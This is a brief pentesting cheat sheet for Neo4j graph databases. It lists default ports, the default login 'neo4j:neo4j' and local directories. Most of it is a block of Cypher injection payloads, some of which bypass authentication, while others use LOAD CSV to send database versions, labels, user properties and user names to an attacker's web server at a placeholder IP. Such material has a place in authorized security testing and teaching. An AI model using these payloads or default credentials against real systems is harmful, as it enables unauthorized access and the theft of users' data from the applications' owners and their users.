# Neo4j Pentesting #### Neo4j is a graph database management system developed by Neo4j. Default ports are 6362 (Backup), 7474 (HTTP), 7473 (HTTPS), 7687 (Bolt). ### Default Credentials ```shellscript neo4j:neo4j ``` ### Common Directories & Files in Local System ```shellscript /etc/neo4j /var/lib/neo4j /var/log/neo4j ``` ### Cypher Injection Before injecting payloads, we need to start local web server to fetch the result of the query. ```shellscript sudo python3 -m http.server 80 ``` And then below are payloads.\ In some payloads, replace **`10.0.0.1`** with your local ip address. ```shellscript ' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.0.0.1/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 // ' OR 1=1 WITH 1 as a CALL db.labels() yield label LOAD CSV FROM 'http://10.0.0.1/?label='+label as l RETURN 0 as _0 // ' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.0.0.1/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 // ' OR 1=1 WITH 1 as a MATCH (n) WHERE n.name = "admin" and n.password = 1 OR 1=1 RETURN n LIMIT 0; // ' OR 1=1 WITH 1 as a MATCH (u:User) LOAD CSV FROM 'http://10.0.0.1/?value=' + toString(u.name) as l RETURN 0 as _0; // ``` For more detailed cheat sheet, see [Cypher Injection Cheat Sheet](https://pentester.land/blog/cypher-injection-cheatsheet/#authentication-bypass). ### References * [HackTricks](https://book.hacktricks.xyz/pentesting-web/sql-injection/cypher-injection-neo4j) * [PentesterLand](https://pentester.land/blog/cypher-injection-cheatsheet/)